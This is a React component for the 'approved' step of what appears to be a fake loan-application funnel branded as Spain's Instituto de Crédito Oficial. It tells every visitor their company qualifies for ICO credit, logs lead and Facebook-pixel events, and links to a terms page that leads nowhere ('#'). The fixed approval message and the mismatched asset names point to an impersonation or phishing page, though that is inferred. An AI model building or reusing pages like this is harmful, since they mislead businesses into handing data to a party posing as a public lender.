import React, { useState, useRef, useEffect } from 'react';
import { useNavigate } from 'react-router-dom';
import './ibcartao.css';
import Loading from "./components/loading"
import { sendEvent } from './Config';
import Footer from './components/Footer';

const Approved = function () {
    const navigate = useNavigate();
    const [isLoading, setIsLoading] = useState(false);
    const leadIdRef = useRef(localStorage.getItem("lead_id"));

    const handleFormSubmit = async (e) => {
        e.preventDefault();
    }

    useEffect(() => {
        sendEvent(leadIdRef.current ?? false, "approved");

        if (typeof window !== "undefined") {
            if (window.location.hostname !== "localhost") {
                if (window.fbq) {
                    window.fbq('track', 'Lead');
                }
            }
        }
    }, []);

    return <>
        {isLoading && <Loading />}
        <div className='header flex items-center'>
            <div className='content flex items-center gap-x-4'>
                <div className='flex items-center w-auto border-r pr-4'>
                    <img src='/assets/img/logo-white.svg?t' className='logo' />
                </div>
                <div className='flex-1'>
                    <span className='subtitle'>Instituto de Crédito Oficial</span>
                </div>
            </div>
        </div>
        <div className="steps mt-5 flex gap-x-2">
            <div className='flex-1 check'></div>
            <div className='flex-1 check'></div>
            <div className='flex-1 check'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
            <div className='flex-1'></div>
        </div>
        <div className='container'>
            <form onSubmit={handleFormSubmit}>
                <div className='content mt-8'>
                    <h1>¡Buenas noticias! Tu empresa cumple los requisitos para el crédito del ICO.</h1>
                    <p className='mt-6 separator-bottom pb-5'>Inicia la simulación ahora y descubre el importe que puedes obtener y el valor de tus cuotas en pocos segundos.</p>
                    <button onClick={(e) => {
                        navigate(`/onboarding/view-pdf/${leadIdRef.current}`);
                    }} className='primary w-full mt-6'>Iniciar Simulación</button>
                    <p className='caption mt-12'>
                        Al continuar, usted acepta los <a href="#">Términos de Uso y la Política de Privacidad</a> de Instituto de Crédito Oficial.
                    </p>
                </div>
            </form>
        </div>
    </>
}

export default Approved;